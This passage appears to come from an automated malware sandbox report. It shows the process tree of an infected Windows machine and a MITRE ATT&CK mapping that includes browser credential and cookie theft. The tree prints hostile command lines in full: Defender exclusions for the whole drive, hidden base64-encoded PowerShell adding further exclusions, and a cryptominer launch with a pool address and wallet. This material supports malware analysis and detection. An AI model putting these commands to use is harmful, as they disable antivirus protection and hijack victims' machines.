        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:6552
  - - C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe
      "C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"
      4⤵
      Executes dropped EXE
      PID:22216
  - - C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
      "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:18388
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:18404
  - - C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe
      "C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:9460
  - - C:\Users\Admin\AppData\Local\Temp\10473270101\8f7a84c735.exe
      "C:\Users\Admin\AppData\Local\Temp\10473270101\8f7a84c735.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:10576
  - - C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe
      "C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:10824
  - - C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe
      "C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:11908
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:11928
  - - C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe
      "C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:12092
  - - C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe
      "C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      PID:12316
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        
        PID:12360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:12524
    - - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        5⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:12368
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.118.49:49301 -u 47kJwZakUCHUPtYBwg8Hc5U3VEjqmPmKiYy8GPVQvdagRU2cTt9Fs4J34haCDRQNPdQ6oyhPQbmxP1dUp6aXVoogBCh9Dva.Worker_CPU -p x --cpu-max-threads-hint=50 -k
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
  2⤵
  PID:5284
- - C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
    C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:16672
  - - C:\Users\Admin\AppData\Local\Temp\pGHcM3xD\7lbjR2suD8JTv0Zd.exe
      C:\Users\Admin\AppData\Local\Temp\pGHcM3xD\7lbjR2suD8JTv0Zd.exe 16672
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:16700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 16700 -s 636
        5⤵
        Program crash
        
        PID:17516
  - - C:\Users\Admin\AppData\Local\Temp\y1ETaysj\9BHd1vZZWudjpitz.exe
      C:\Users\Admin\AppData\Local\Temp\y1ETaysj\9BHd1vZZWudjpitz.exe 16672
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:7068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 644
        5⤵
        Program crash
        
        PID:9360
  - - C:\Users\Admin\AppData\Local\Temp\y1ETaysj\8pg3R6AjxHpV7qLM.exe
      C:\Users\Admin\AppData\Local\Temp\y1ETaysj\8pg3R6AjxHpV7qLM.exe 16672
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:10856
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:11500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:12480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:12488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBNAHAAUABSAGUAZgBFAFIAZQBOAGMARQAgAC0AZQB4AGMAbAB1AFMAaQBvAG4AUABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBPAFIAYwBFADsAIABBAEQAZAAtAE0AcABQAFIAZQBmAEUAcgBlAG4AQwBFACAALQBFAFgAQwBsAFUAUwBpAE8ATgBwAHIATwBDAGUAUwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AcgBjAEUA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6904

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7060

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6336
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5428

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7156

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBNAFAAUABSAEUARgBlAFIARQBuAEMAZQAgAC0ARQBYAEMATAB1AHMASQBPAG4AUABSAG8AQwBlAFMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwByAGMARQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7076

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6072

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5272

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6360 -ip 6360
1⤵
PID:16580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 16700 -ip 16700
1⤵
PID:17456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5392 -ip 5392
1⤵
PID:22212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5924 -ip 5924
1⤵
PID:17844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 22080 -ip 22080
1⤵
PID:18180

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:20948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:21756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7068 -ip 7068
1⤵
PID:9324

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:10040

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:11724

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:11776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion